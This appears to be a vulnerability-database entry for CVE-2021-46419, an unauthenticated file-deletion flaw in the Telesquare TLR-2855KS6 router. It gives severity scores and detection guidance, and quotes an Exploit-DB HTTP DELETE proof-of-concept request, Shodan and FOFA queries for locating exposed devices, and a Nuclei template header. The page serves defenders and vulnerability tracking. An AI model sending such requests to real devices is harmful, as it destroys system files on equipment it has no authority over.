CVE-2021-46419
published 2022-04-07CVE-2021-46419: An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.
PriorityP274critical9.1CVSS 3.1
AVNACLPRNUINSUCNIHAH
EXPLOIT
EPSS
71.38%
99.3th percentile
An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploit attempts by monitoring for unauthenticated HTTP DELETE requests targeting the /cgi-bin/ path on Telesquare TLR-2855KS6 devices (lighttpd server). ↗
- →Identify exposed TLR-2855KS6 devices via Shodan using the query: title:"Login to TLR-2855KS6" or http.title:"login to tlr-2855ks6". ↗
- →Identify exposed TLR-2855KS6 devices via FOFA using: product=="TELESQUARE-TLR-2855KS6" or title="login to tlr-2855ks6". ↗
- →Exploit sequence involves a two-step HTTP interaction: a PUT request to /cgi-bin/<filename>.txt returning HTTP 201, followed by a DELETE request to the same path returning HTTP 204. Alert on this pattern. ↗
- →The exploit uses the DNT: 1 header in both PUT and DELETE requests; correlate this with DELETE/PUT methods to /cgi-bin/ as a detection signal. ↗
- ·The vulnerability requires no authentication (PR:N, UI:N per CVSS), meaning any unauthenticated HTTP DELETE request to /cgi-bin/ paths is sufficient to delete files — no session or credentials are needed. ↗
- ·The nonce cookie value in the PoC (nonce=16426923592222) is specific to the researcher's test session and is NOT required for exploitation — the vulnerability is unauthenticated. ↗
- ·The affected device runs lighttpd as its web server; server fingerprinting via the Server response header can confirm target identity before triggering alerts. ↗
CVSS provenance
nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Telesquare TLR-2855KS6 - Arbitrary File Deletion
exploitdb·2022-04-11·CVSS 9.1
CVE-2021-46419 [CRITICAL] Telesquare TLR-2855KS6 - Arbitrary File Deletion
Telesquare TLR-2855KS6 - Arbitrary File Deletion
---
# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.telesquare.co.kr/
# Version: TLR-2855KS6
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46419
# Proof of Concept
DELETE /cgi-bin/test.cgi HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 438
Origin: http://192.168.1.5
DNT: 1
Connection: close
Referer: http://192.168.1.5/
Cookie: nonce=16426923592222
Nuclei
Telesquare TLR-2855KS6 - Arbitrary File Deletion
nuclei·CVSS 9.1
CVE-2021-46419 [CRITICAL] Telesquare TLR-2855KS6 - Arbitrary File Deletion
Telesquare TLR-2855KS6 - Arbitrary File Deletion
An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.
Template:
id: CVE-2021-46419
info:
name: Telesquare TLR-2855KS6 - Arbitrary File Deletion
author: DhiyaneshDK
severity: critical
description: |
An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.
impact: |
Unauthenticated attackers can delete arbitrary files from the Telesquare TLR-2855KS6 device using HTTP DELETE requests, potentially destroying system files and rendering the device inoperable.
remediation: |
Apply firmware updates provided by Telesquare or restrict HTTP DELETE access to the device.
reference:
- https://
No writeups or analysis indexed.
http://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.htmlhttps://drive.google.com/drive/folders/1TWw3Oy0wZImSHK_hj-tKkbn9sFgqqySphttp://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.htmlhttps://drive.google.com/drive/folders/1TWw3Oy0wZImSHK_hj-tKkbn9sFgqqySp
2022-04-07
Published